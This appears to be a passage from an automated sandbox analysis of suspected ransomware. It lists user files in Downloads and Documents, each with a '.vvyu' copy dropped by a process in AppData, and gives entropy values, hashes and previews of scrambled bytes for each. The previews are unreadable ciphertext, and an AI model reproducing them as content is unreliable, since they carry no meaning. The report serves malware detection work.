Preview:	ZGGKNV.......H.s..-&1!..#.\....).......m.v..M....X...-,.....L......=.2O..k7WT.([.@..`#.J$ff..o..h....SG..{....z.'..^.(_.F.}I....3M........._.]cr...1d..J.+.bT,b.yG...h..cQ.}...i.......}.r.....1....1.Q.o.!\|..;1W..........~..EktO....>.@$.CM.3I.d....K...@.R....K..i5.T...z....c......o].&..X^.............r......a.8.m...7.j.}@N.vw.......s.d......<B...h......\...d~.....]$z..!<Q.]g!.9..W.....2....q.h..:h.@\|....nTc)<..X.}..k.....R.N.Cy.q....C..v..z.`MKO...vs."..n.[ad.....7L.Wk'.S.A.O..MTb.pY......zP>....w..di.....q@.m.#..m.c...O.T..[I....B...g...5:v.L{vT.T<..:.P.r....k[9L...@...t.Z\).>..B.2...n+O.Z.=...f..m..#.B.%..F..F...6.....7..k...........#.E.7..%.dzg.............9..d...X.4.....@?...{O....!..D.p..E..}....E.......p:.,.5n...K.#..8...S+.H.r^.ce..L0........D..(..../.>C..\|..f-...o.....C].?....1..."^=....,z!G-............r.&.{..>..D.)g...."@e...0\|....<..O+!....J.D.......y&............B.,V..T...6.&P...7.?.Uu._.D".=m.'}N.6... ...t...8..`........

C:\Users\user\Documents\ZGGKNSUKOP.png.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85981710732032
Encrypted:	false
SSDEEP:	24:H/gMiOHRi37UW6yVJlGzGIjlBnV8ZkMDhDnZFeTOsWAqbflxuJShUsbD:Sp37U/8TIjuzTZUzqbfb1UmD
MD5:	52D8D4BCE529EAF982C5669A76B9A427
SHA1:	1ED9876240977A6D1365AC38EA060B34D5ABF0D4
SHA-256:	DF505F3EC70C4AACC686BA96A299C673C3B1FCF26629D16821050673AA9C5687
SHA-512:	4B340CC3514C236C65B42F68834DEC1ED3D1D97B338D9097446F8D1838F7639E16426BB99A19E4475659D345B1943235F44C8A44999A1367DAF7E37DC2AC5AE9
Malicious:	false
Preview:	ZGGKNV.......H.s..-&1!..#.\....).......m.v..M....X...-,.....L......=.2O..k7WT.([.@..`#.J$ff..o..h....SG..{....z.'..^.(_.F.}I....3M........._.]cr...1d..J.+.bT,b.yG...h..cQ.}...i.......}.r.....1....1.Q.o.!\|..;1W..........~..EktO....>.@$.CM.3I.d....K...@.R....K..i5.T...z....c......o].&..X^.............r......a.8.m...7.j.}@N.vw.......s.d......<B...h......\...d~.....]$z..!<Q.]g!.9..W.....2....q.h..:h.@\|....nTc)<..X.}..k.....R.N.Cy.q....C..v..z.`MKO...vs."..n.[ad.....7L.Wk'.S.A.O..MTb.pY......zP>....w..di.....q@.m.#..m.c...O.T..[I....B...g...5:v.L{vT.T<..:.P.r....k[9L...@...t.Z\).>..B.2...n+O.Z.=...f..m..#.B.%..F..F...6.....7..k...........#.E.7..%.dzg.............9..d...X.4.....@?...{O....!..D.p..E..}....E.......p:.,.5n...K.#..8...S+.H.r^.ce..L0........D..(..../.>C..\|..f-...o.....C].?....1..."^=....,z!G-............r.&.{..>..D.)g...."@e...0\|....<..O+!....J.D.......y&............B.,V..T...6.&P...7.?.Uu._.D".=m.'}N.6... ...t...8..`........

C:\Users\user\Downloads\BJZFPPWAPT.mp3

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.866066766575572
Encrypted:	false
SSDEEP:	24:HZQmYrHt2CoH9K5vTNfcUlnXUvf+u4wcU4jU1lR/qZD68PjQluosm9i4sbD:H+maHECoHApcMXMfR+UQ2z/qZD6sjQl0
MD5:	4415EB64E444A50E8FEE23B1761D6DF6
SHA1:	BAB831EBF09BCDA84ABA605F925BD5503D7C619F
SHA-256:	6DB6F8443D3441B209C8A80EF6C8349A0FDFC95B01542CF6AC1E4EB42CD94409
SHA-512:	C5F9FB7083F862BFB945D7989EE9CE7EAF28C7E9459DA112EC95286FBCA4C1407C62196C78E2360768383C8D9A9EAEFB8218B6FC262C40830C8D50B990511CBF
Malicious:	false
Preview:	BJZFP.u....}:(.(......dX..2.VyaEP...r..-.Sb.W..;...&..?....@......7M{....a..>..i]....P.f.....}_.\n<....(....,.,...y.J...Y..6..m..;$s...J.......{.v...7.x..u..0...h._.%....H.\|...@.H.............._.y..[.R.}..N`G........et..G....h.,..Q.\...ud.......^.B...@.V+..}.uK..h..<B.7.....f......x..}"....F..l..].........H......U.L.6~.?.w..6.`..B!!K-.`.hI......\..N0(Q.b..f..j.%.>....J.....N........y...H.........X42.....\|h......M..q):....+...[..._.V..........k.A...o/......2T.J..W.s'....Y...,./t.....L..?d.....:v_...?.%..wj.&B.S;\|.0C^..~.ejJ........Q..U.#....\.l...s1.FN.D....W.0...%j.r\...p...-.tD.<md.G........O..:..s.Hi....D.......<..b>+.....B7..YV..X.A.....I9.......Da...S..E..`=SA&.T#..6....@.........!.Q.N....%#.X.<....f..^.....m.p.....^..`S..^..-6..1.(...&rz.@...K_...fGK...%.e.W...........G\.gnb.91...p...>...=.O.5..3....f..n*.Nf...2%.&.'.....i;..Yl.B.v.@..;!..{.6..\d..h\...m..n....,G..M...vf....u{..7@;rf.H.Vb....F..]......1).n..p..eJI.9.~..,...D

C:\Users\user\Downloads\BJZFPPWAPT.mp3.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.866066766575572
Encrypted:	false
SSDEEP:	24:HZQmYrHt2CoH9K5vTNfcUlnXUvf+u4wcU4jU1lR/qZD68PjQluosm9i4sbD:H+maHECoHApcMXMfR+UQ2z/qZD6sjQl0
MD5:	4415EB64E444A50E8FEE23B1761D6DF6
SHA1:	BAB831EBF09BCDA84ABA605F925BD5503D7C619F
SHA-256:	6DB6F8443D3441B209C8A80EF6C8349A0FDFC95B01542CF6AC1E4EB42CD94409
SHA-512:	C5F9FB7083F862BFB945D7989EE9CE7EAF28C7E9459DA112EC95286FBCA4C1407C62196C78E2360768383C8D9A9EAEFB8218B6FC262C40830C8D50B990511CBF
Malicious:	false
Preview:	BJZFP.u....}:(.(......dX..2.VyaEP...r..-.Sb.W..;...&..?....@......7M{....a..>..i]....P.f.....}_.\n<....(....,.,...y.J...Y..6..m..;$s...J.......{.v...7.x..u..0...h._.%....H.\|...@.H.............._.y..[.R.}..N`G........et..G....h.,..Q.\...ud.......^.B...@.V+..}.uK..h..<B.7.....f......x..}"....F..l..].........H......U.L.6~.?.w..6.`..B!!K-.`.hI......\..N0(Q.b..f..j.%.>....J.....N........y...H.........X42.....\|h......M..q):....+...[..._.V..........k.A...o/......2T.J..W.s'....Y...,./t.....L..?d.....:v_...?.%..wj.&B.S;\|.0C^..~.ejJ........Q..U.#....\.l...s1.FN.D....W.0...%j.r\...p...-.tD.<md.G........O..:..s.Hi....D.......<..b>+.....B7..YV..X.A.....I9.......Da...S..E..`=SA&.T#..6....@.........!.Q.N....%#.X.<....f..^.....m.p.....^..`S..^..-6..1.(...&rz.@...K_...fGK...%.e.W...........G\.gnb.91...p...>...=.O.5..3....f..n*.Nf...2%.&.'.....i;..Yl.B.v.@..;!..{.6..\d..h\...m..n....,G..M...vf....u{..7@;rf.H.Vb....F..]......1).n..p..eJI.9.~..,...D

C:\Users\user\Downloads\BJZFPPWAPT.pdf

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.823524243382432
Encrypted:	false
SSDEEP:	24:Dg8ZGJk+sOH4hVZQjGPSdOEIxuMZiCKBSSeqN+I/Rj7n0T/sbD:EYGF8hSGadOE0lcCKBJR3W/mD
MD5:	8D3FC8005EA9228EE2631A37EEBC2C38
SHA1:	225808E2EB548131227FECE0EDB1A6B80971AFEF
SHA-256:	77CD75A7CAFEC9537D5F158C9D1CE9EED264C4BD3000903B6B3BED9F4669A812
SHA-512:	BACCFE8E8248AA62D4B48F25D397A035B6A6B58761CB3FD9C5A4170F1A74E2342473BE11BA962A2EF64F167D238B93C9349063DEAB8E21415339ED2470EE01F0
Malicious:	false
Preview:	BJZFP"^S.2.?P"(.p.q...8...0....#.. ...";..MJ;......Q....r.n-.....-..I]..........+.WJ...t.a. qL..s.#.aY....}.....y;...nU..j.......R.....\.....A.p~a...~.A.^y.l...?uG..r.P..q...........m.b6o....\+.I".X.n9....@.(..,.......A0@C....!.uh8.1.........vx.i\.,......h!.....#.`.X.!_.1.Qo5...5..HZR}.&..y...t..\|.~.....NID..;C.JK>J-\Fx..@........jWix..J.%.x..t...%..h0!.g..%.Q.G-..4..x-6.i.-.}......kHx...~..?a...7..G(..+>.0R....;...b......p.T..v.O..q..RvU...,....10..{at}C04?..I..,/....s.4<...Q..4`&S....LM6.f.Mu....C.\...YU.(2O..P.."5LD...!v@p..!......l.<:...Z..<cf...x:..=.;Z&\%.".[.KJ'.=q\|A..t<.gh_...8.Oa$.,ai.:Xe.....-lZ.._G.j.....:S....<3..:.Y.7....L...u ......3.....NO@7o...7. ...G...\|......,J6.Q.B..I[!.T.#3N.c!s....}a...d...~.L<m.!_..z.[.....B...>9.y..m<....Y...Dv..;b..7~.a:p......L....c..&..[....f.a....b...O..9Kv..L.D..'+H...-.....^R~x..6.Sj..3..,.<.....Q.....A.U...$.....s.F.._.c.@{d....0I...7.....>.......{.raD....2. .]..j...........Io.Y...R...Q....=.C.D4.a

C:\Users\user\Downloads\BJZFPPWAPT.pdf.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.823524243382432
Encrypted:	false
SSDEEP:	24:Dg8ZGJk+sOH4hVZQjGPSdOEIxuMZiCKBSSeqN+I/Rj7n0T/sbD:EYGF8hSGadOE0lcCKBJR3W/mD
MD5:	8D3FC8005EA9228EE2631A37EEBC2C38
SHA1:	225808E2EB548131227FECE0EDB1A6B80971AFEF
SHA-256:	77CD75A7CAFEC9537D5F158C9D1CE9EED264C4BD3000903B6B3BED9F4669A812
SHA-512:	BACCFE8E8248AA62D4B48F25D397A035B6A6B58761CB3FD9C5A4170F1A74E2342473BE11BA962A2EF64F167D238B93C9349063DEAB8E21415339ED2470EE01F0
Malicious:	false
Preview:	BJZFP"^S.2.?P"(.p.q...8...0....#.. ...";..MJ;......Q....r.n-.....-..I]..........+.WJ...t.a. qL..s.#.aY....}.....y;...nU..j.......R.....\.....A.p~a...~.A.^y.l...?uG..r.P..q...........m.b6o....\+.I".X.n9....@.(..,.......A0@C....!.uh8.1.........vx.i\.,......h!.....#.`.X.!_.1.Qo5...5..HZR}.&..y...t..\|.~.....NID..;C.JK>J-\Fx..@........jWix..J.%.x..t...%..h0!.g..%.Q.G-..4..x-6.i.-.}......kHx...~..?a...7..G(..+>.0R....;...b......p.T..v.O..q..RvU...,....10..{at}C04?..I..,/....s.4<...Q..4`&S....LM6.f.Mu....C.\...YU.(2O..P.."5LD...!v@p..!......l.<:...Z..<cf...x:..=.;Z&\%.".[.KJ'.=q\|A..t<.gh_...8.Oa$.,ai.:Xe.....-lZ.._G.j.....:S....<3..:.Y.7....L...u ......3.....NO@7o...7. ...G...\|......,J6.Q.B..I[!.T.#3N.c!s....}a...d...~.L<m.!_..z.[.....B...>9.y..m<....Y...Dv..;b..7~.a:p......L....c..&..[....f.a....b...O..9Kv..L.D..'+H...-.....^R~x..6.Sj..3..,.<.....Q.....A.U...$.....s.F.._.c.@{d....0I...7.....>.......{.raD....2. .]..j...........Io.Y...R...Q....=.C.D4.a

C:\Users\user\Downloads\BJZFPPWAPT.xlsx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.861455713432876
Encrypted:	false
SSDEEP:	24:werV2JhKcPTcC4TDx0aJHvuBi3NlS11GK6AXOZE43VGfbsmkTKoQFVPZJCKAsbD:DrVKccbd4Ttvus9rLA/4FiWUP2LmD
MD5:	D06C7AAACEB6822B85C3C995E794FA44
SHA1:	CADB0C0413D0BB02790EEBEF2902D0665A250ACB
SHA-256:	2522781136000515ACF2F92F3C22BF2C2013D596704390A4E00EDE18027AE9BA
SHA-512:	1E0E8956B849335F2D57C0689C5305A56992AFDACE846D45D400501ABCC749791FD52BBB717922A5E832407EC530AF89635A46DD593BCD890F5888FCF8E4736C
Malicious:	false
Preview:	BJZFP...E..\|.c...-^..}..BH'p...'/.\|.1....p@...(.(.4....}e.Xqu'..`.z"..._\....^.]R.S...&..v.\..u...{..{....Q....D....$;....F.<7......d..<..b.}4`a.;...;.....F.A../....../...W_H.!....C.i.+Z.].B...%h.(...).....1....:;....?.U.....X......W...%..\|3LW8.,x..$,...%...........Zu...W.}.r......bY./.).I..OP^.n......x...=>V.n.l>^..t..............-b(.-.%.D6......)n)'..lV^.S....[c.W]Ay.j.u!A\.GYD{......;...80.G..x...@..Y.P......9.Z.;Z.%.$..q.[.4x..ow..>...D.e..?.>...V~...n..y...6$.p..I..{z..b.......B.A5RF\|...3...5..o...@.dfVLWC...U{...-[.\.....D`......8h...j.l..)4....e...{>...[."....~...l.\qs.,..L...O.+....>..QD1.U.m.GsAFZ.i...7d..;.:...i.>J.\|...u.q.TC..x.X.vD.."..]...gnl...Q.L...)../2.?.7...l........g.{8.%..V.R;hIK.^....J..=M.Tp.I..".Q.:.t....]g.<.B...z....%'..g{.....8[mF..9..~'w..5`.Y...."..5...<...I..%.+.fV.fIk.2..P....A...^S..t.P..Cu.R.=.......oZ.8<f}j...A.h..(._[........ut5..k.."X..>.....T..`..~>5.4rm"....2,......L.0.\|.U....2m\..TY;.GH.(...

C:\Users\user\Downloads\BJZFPPWAPT.xlsx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.861455713432876
Encrypted:	false
SSDEEP:	24:werV2JhKcPTcC4TDx0aJHvuBi3NlS11GK6AXOZE43VGfbsmkTKoQFVPZJCKAsbD:DrVKccbd4Ttvus9rLA/4FiWUP2LmD
MD5:	D06C7AAACEB6822B85C3C995E794FA44
SHA1:	CADB0C0413D0BB02790EEBEF2902D0665A250ACB
SHA-256:	2522781136000515ACF2F92F3C22BF2C2013D596704390A4E00EDE18027AE9BA
SHA-512:	1E0E8956B849335F2D57C0689C5305A56992AFDACE846D45D400501ABCC749791FD52BBB717922A5E832407EC530AF89635A46DD593BCD890F5888FCF8E4736C
Malicious:	false
Preview:	BJZFP...E..\|.c...-^..}..BH'p...'/.\|.1....p@...(.(.4....}e.Xqu'..`.z"..._\....^.]R.S...&..v.\..u...{..{....Q....D....$;....F.<7......d..<..b.}4`a.;...;.....F.A../....../...W_H.!....C.i.+Z.].B...%h.(...).....1....:;....?.U.....X......W...%..\|3LW8.,x..$,...%...........Zu...W.}.r......bY./.).I..OP^.n......x...=>V.n.l>^..t..............-b(.-.%.D6......)n)'..lV^.S....[c.W]Ay.j.u!A\.GYD{......;...80.G..x...@..Y.P......9.Z.;Z.%.$..q.[.4x..ow..>...D.e..?.>...V~...n..y...6$.p..I..{z..b.......B.A5RF\|...3...5..o...@.dfVLWC...U{...-[.\.....D`......8h...j.l..)4....e...{>...[."....~...l.\qs.,..L...O.+....>..QD1.U.m.GsAFZ.i...7d..;.:...i.>J.\|...u.q.TC..x.X.vD.."..]...gnl...Q.L...)../2.?.7...l........g.{8.%..V.R;hIK.^....J..=M.Tp.I..".Q.:.t....]g.<.B...z....%'..g{.....8[mF..9..~'w..5`.Y...."..5...<...I..%.+.fV.fIk.2..P....A...^S..t.P..Cu.R.=.......oZ.8<f}j...A.h..(._[........ut5..k.."X..>.....T..`..~>5.4rm"....2,......L.0.\|.U....2m\..TY;.GH.(...

C:\Users\user\Downloads\DUUDTUBZFW.jpg

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855485586616677
Encrypted:	false
SSDEEP:	24:4iXYkOJ1WLvfTedCwMBlxMPmJ2HtmRobS5q2mIgE2zH9NOzgBZosbD:tOD03Tb3xMPmJ2HtAobS5q2mdN79NO5+
MD5:	F1DB64B78433D540DBE40898B9C9E700
SHA1:	02B52267B177687FA911EAAF739B108F06FAE1EC
SHA-256:	6C2096129BE65140E8199D736B8C744F3CC4ED23F1405C2703666A6BCD19C666
SHA-512:	1071C2DEB42F275FF6EFC54511BA54D903EE1D899F0D23D81ADE9213DB0FE777CD2BB7603B620161C86BA1726606C13705D6BE88C8476747727062FC2B780DE8
Malicious:	false
Preview:	DUUDT.A......z.."... .yv?..V_.R.ZB.g.d..&...].,5..'......".nnoW....%S}..K.E[16a.+...F&.Y.=._.....2.........Z....=0..5.$#q..z]j...]..y.:.%I.Gt.'.>....\|J...?....k.......i.......%\|.z..-L.0(_.W..]....L...N.`.1...+5..[.O..a8..pm..c.C.n.........F.B<.F.3-...vS.q.0...........Gc...}J..V3..~.....K.B..%<.p{..G_4%cw......I{m.^..=.."...O..5.....gx..\..Y&.f.`.7..~.b.]D..C.wC..w.../..e9.Q....9_.%.v_....ot.....k&.....[}+.....;W{y..3j.).....3....Y..+ .^........L}N\..@&.`.e\|s...../...~...q(w.emsqY..."4@Y...\|..om..\..^.2r....O5...PQ._....U.....Nh.^?..3...p.!....`....G..<`].f..T...n.......s?.Rr..b^...H...T.vU..3.}...2[JU.2.....>.O.D^.+9...=..JN..A.K5.J6p.{J..yw.+...@<.ks.g.G.....0e..hXyX-.a...(0; ....~....\.K..'...@&J...K.g..^U..:......?R...k....(80z.....@.bDV..l..s>.../yO.........."l...'....4WC..,}.p...!..n.N(..z..U.Ic..G........!...~.6.+l..q...+.T..s.........f..n.2... ...Z{..!.8..+..3.J...7\|+.qV..x..;...M__....GR.d...1...U.../...........\|... r..j

C:\Users\user\Downloads\DUUDTUBZFW.jpg.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855485586616677
Encrypted:	false
SSDEEP:	24:4iXYkOJ1WLvfTedCwMBlxMPmJ2HtmRobS5q2mIgE2zH9NOzgBZosbD:tOD03Tb3xMPmJ2HtAobS5q2mdN79NO5+
MD5:	F1DB64B78433D540DBE40898B9C9E700
SHA1:	02B52267B177687FA911EAAF739B108F06FAE1EC
SHA-256:	6C2096129BE65140E8199D736B8C744F3CC4ED23F1405C2703666A6BCD19C666
SHA-512:	1071C2DEB42F275FF6EFC54511BA54D903EE1D899F0D23D81ADE9213DB0FE777CD2BB7603B620161C86BA1726606C13705D6BE88C8476747727062FC2B780DE8
Malicious:	false
Preview:	DUUDT.A......z.."... .yv?..V_.R.ZB.g.d..&...].,5..'......".nnoW....%S}..K.E[16a.+...F&.Y.=._.....2.........Z....=0..5.$#q..z]j...]..y.:.%I.Gt.'.>....\|J...?....k.......i.......%\|.z..-L.0(_.W..]....L...N.`.1...+5..[.O..a8..pm..c.C.n.........F.B<.F.3-...vS.q.0...........Gc...}J..V3..~.....K.B..%<.p{..G_4%cw......I{m.^..=.."...O..5.....gx..\..Y&.f.`.7..~.b.]D..C.wC..w.../..e9.Q....9_.%.v_....ot.....k&.....[}+.....;W{y..3j.).....3....Y..+ .^........L}N\..@&.`.e\|s...../...~...q(w.emsqY..."4@Y...\|..om..\..^.2r....O5...PQ._....U.....Nh.^?..3...p.!....`....G..<`].f..T...n.......s?.Rr..b^...H...T.vU..3.}...2[JU.2.....>.O.D^.+9...=..JN..A.K5.J6p.{J..yw.+...@<.ks.g.G.....0e..hXyX-.a...(0; ....~....\.K..'...@&J...K.g..^U..:......?R...k....(80z.....@.bDV..l..s>.../yO.........."l...'....4WC..,}.p...!..n.N(..z..U.Ic..G........!...~.6.+l..q...+.T..s.........f..n.2... ...Z{..!.8..+..3.J...7\|+.qV..x..;...M__....GR.d...1...U.../...........\|... r..j

C:\Users\user\Downloads\EEGWXUHVUG.docx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8589225327182985
Encrypted:	false
SSDEEP:	24:IfdR6mu7nq7euVN2olgp7HheSZLhZ2hhAC162YCuoFrsBydsbD:sSM7IomBe0LhZ2hyiDsBydmD
MD5:	13AC72A4FB0E78E1AF91A9273AAADE14
SHA1:	14FB28FE0E2122FDB39A4AD2BD5E8A649948560F
SHA-256:	54B3BC6E6E825150307FADFE78DD5E2D36225EFF85B029A7B1E15061D39801C3
SHA-512:	8B880B6111C2CA68820A943151CBBBB0FF21D65BB85D25EB578F8267AC785DA33D290B8FEE87E77DB2CFBBF36260B85698D88699B6B6F85BBDE2E308D0944500
Malicious:	false
Preview:	EEGWX......0..iy..<2.^b.c.[.....).z...&.a.<...O.....U....m..B..<Y.......k.s.n.e.\|x..2..-em.9(.2..n\.]az.9~........$..[!v.....$...... .).Q&/...M..Iv$cl..l...@\..S0.P}.e.]....2.J.I...h..y. ......<..Y-Nt.....@.W.N...O.-..x.@8.L.64R.........U...R...:..xb..j.v.g.>w.7..d.D'..yU.....)L/o&..T.....Ga..n...+.G.Bc.'...uo.&.)..YA...G......c.d\|.....v..B./!.............h...F........B..s..b.I....:.w.[.A...4.$.....J%......h._.HGP...V.'....1..uP3._..}..v....C......w.Q."A..d.(.w.4..F....m.4\|..i86<.4..cl.T.w..m.S..o~.#...Q...q....3.....&..T.T..{..V.+...P..y........f.K..T..}X.4...gg....#.'^.$....]3.Y6......>....6.....8zLJ.?..v....a..cY.`...n.,..MC....P^)...+....E..c. .@)..R.....9IB...M..P..l.e....\^..).e....a..)........5h}\.- .P..$(@#..g........x.J..p..j...=R.3H.G..4.....B.v.Aj.Fz..^.......>..^....7..!.q..9..LT.s....j.R+b..e=.}b..w..2.....<./.....#...q..dD#.....>y.}.-...D.(8_/=deau.........;:\.=5...]..`..vt.:>.3...`../...H..l..6.B...;.."..

C:\Users\user\Downloads\EEGWXUHVUG.docx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8589225327182985
Encrypted:	false
SSDEEP:	24:IfdR6mu7nq7euVN2olgp7HheSZLhZ2hhAC162YCuoFrsBydsbD:sSM7IomBe0LhZ2hyiDsBydmD
MD5:	13AC72A4FB0E78E1AF91A9273AAADE14
SHA1:	14FB28FE0E2122FDB39A4AD2BD5E8A649948560F
SHA-256:	54B3BC6E6E825150307FADFE78DD5E2D36225EFF85B029A7B1E15061D39801C3
SHA-512:	8B880B6111C2CA68820A943151CBBBB0FF21D65BB85D25EB578F8267AC785DA33D290B8FEE87E77DB2CFBBF36260B85698D88699B6B6F85BBDE2E308D0944500
Malicious:	false
Preview:	EEGWX......0..iy..<2.^b.c.[.....).z...&.a.<...O.....U....m..B..<Y.......k.s.n.e.\|x..2..-em.9(.2..n\.]az.9~........$..[!v.....$...... .).Q&/...M..Iv$cl..l...@\..S0.P}.e.]....2.J.I...h..y. ......<..Y-Nt.....@.W.N...O.-..x.@8.L.64R.........U...R...:..xb..j.v.g.>w.7..d.D'..yU.....)L/o&..T.....Ga..n...+.G.Bc.'...uo.&.)..YA...G......c.d\|.....v..B./!.............h...F........B..s..b.I....:.w.[.A...4.$.....J%......h._.HGP...V.'....1..uP3._..}..v....C......w.Q."A..d.(.w.4..F....m.4\|..i86<.4..cl.T.w..m.S..o~.#...Q...q....3.....&..T.T..{..V.+...P..y........f.K..T..}X.4...gg....#.'^.$....]3.Y6......>....6.....8zLJ.?..v....a..cY.`...n.,..MC....P^)...+....E..c. .@)..R.....9IB...M..P..l.e....\^..).e....a..)........5h}\.- .P..$(@#..g........x.J..p..j...=R.3H.G..4.....B.v.Aj.Fz..^.......>..^....7..!.q..9..LT.s....j.R+b..e=.}b..w..2.....<./.....#...q..dD#.....>y.}.-...D.(8_/=deau.........;:\.=5...]..`..vt.:>.3...`../...H..l..6.B...;.."..

C:\Users\user\Downloads\EEGWXUHVUG.xlsx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.823669813283552
Encrypted:	false
SSDEEP:	24:WRIujxn4hKd+aGbJ0wfSUb/Zv3gVn5nV1EfSs6NQvEIm3NERbyjExZfRVsbD:WOugKgZJzKmvq1Ef96asvdEojExZfRV+
MD5:	C471B9F2FDE690B947E33C07861178B5
SHA1:	F2EE73DE3D1FFAD588052FDE32B95AF6326BBFE6
SHA-256:	9F365D4629BF1AF8D210EAA3C2725ABC2D269D4929812884D5470641973A6449
SHA-512:	93728C83AD17372356D822A8C08F44D00CA6B6A0BDEA090A792C85D993066A1B275E20FAF604E6D264800A9379401B0D67068D77F53ACE61C581A112D2331637
Malicious:	false
Preview:	EEGWX.T..B..r.xN......%.e.Uw...!2.....z......f1.o..P....S....g..o..k........5(g.]0N'k.x..,.W..N.....7.a.....\|.D".....~A`.[..v_q..../........F..r..B(..u>V..m\.E...0......z4#.".F.4...7;~../\......,.x.<......}......<#.K..k...k..p.U.1.7{...t....uV.................4.$iAc.......W".E...c%\|.s.....g.....v.R.'...]#e..p.o...%......GtZ..,11...P.al..7B.....R?\|..-...RB..]..U.o.#.z..8G.t$vA.mX......(..R,.<,.MK........\|..."..D.p......}..X....~.._.i...w-..{#.@.......K....+~....L8P....\.+..p>F.......!^K.....>....{.V.-..-.*%....u.L).(.J...E.I...1...l./Z.5...r.....0P)....{sc.2.q.}....n...Q.$yU....j!Eh.....$.to%...5..g..].......j..c.%... .....iw.a..K{..$.q.30.C.......-v.0.......}..\..^.L.Jy....k... >..c$P+...:........y......mNc~,.=..v......La..#'.\/D.k.E.N........])R..s5..9.#...\|i.<.pu....X.C......q....t$..L...{....;.#U....Ae...f....^.m.\.K..k7...V.q ...[..)>....V...6...g......G1U..3..b.$si..z')\W@....yHtJ.A..../1....r!keZ...M;d.._r-..7.3r.$...y...[.F.e..?.@.

C:\Users\user\Downloads\EEGWXUHVUG.xlsx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.823669813283552
Encrypted:	false
SSDEEP:	24:WRIujxn4hKd+aGbJ0wfSUb/Zv3gVn5nV1EfSs6NQvEIm3NERbyjExZfRVsbD:WOugKgZJzKmvq1Ef96asvdEojExZfRV+
MD5:	C471B9F2FDE690B947E33C07861178B5
SHA1:	F2EE73DE3D1FFAD588052FDE32B95AF6326BBFE6
SHA-256:	9F365D4629BF1AF8D210EAA3C2725ABC2D269D4929812884D5470641973A6449
SHA-512:	93728C83AD17372356D822A8C08F44D00CA6B6A0BDEA090A792C85D993066A1B275E20FAF604E6D264800A9379401B0D67068D77F53ACE61C581A112D2331637
Malicious:	false
Preview:	EEGWX.T..B..r.xN......%.e.Uw...!2.....z......f1.o..P....S....g..o..k........5(g.]0N'k.x..,.W..N.....7.a.....\|.D".....~A`.[..v_q..../........F..r..B(..u>V..m\.E...0......z4#.".F.4...7;~../\......,.x.<......}......<#.K..k...k..p.U.1.7{...t....uV.................4.$iAc.......W".E...c%\|.s.....g.....v.R.'...]#e..p.o...%......GtZ..,11...P.al..7B.....R?\|..-...RB..]..U.o.#.z..8G.t$vA.mX......(..R,.<,.MK........\|..."..D.p......}..X....~.._.i...w-..{#.@.......K....+~....L8P....\.+..p>F.......!^K.....>....{.V.-..-.*%....u.L).(.J...E.I...1...l./Z.5...r.....0P)....{sc.2.q.}....n...Q.$yU....j!Eh.....$.to%...5..g..].......j..c.%... .....iw.a..K{..$.q.30.C.......-v.0.......}..\..^.L.Jy....k... >..c$P+...:........y......mNc~,.=..v......La..#'.\/D.k.E.N........])R..s5..9.#...\|i.<.pu....X.C......q....t$..L...{....;.#U....Ae...f....^.m.\.K..k7...V.q ...[..)>....V...6...g......G1U..3..b.$si..z')\W@....yHtJ.A..../1....r!keZ...M;d.._r-..7.3r.$...y...[.F.e..?.@.

C:\Users\user\Downloads\EFOYFBOLXA.jpg

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838640069145371
Encrypted:	false
SSDEEP:	24:Ez9t1X8ixCtkgoFC/fP4pxzmZwMMqyUGX8P1tYZwdj/+7Sk+/ghsbD:6X86Ckd8/fP4p9EI8PnXdb+ukFmD
MD5:	A848AD17DF6CD4BE7F544AAEF2B1AE16
SHA1:	DF4065A8B7A067D7BB9374FB74F126AA4CABE4B2
SHA-256:	B6AF7DF2DB6CBBD4347EE6AADBFA454282ADFF773BDF90244E377363111771A0
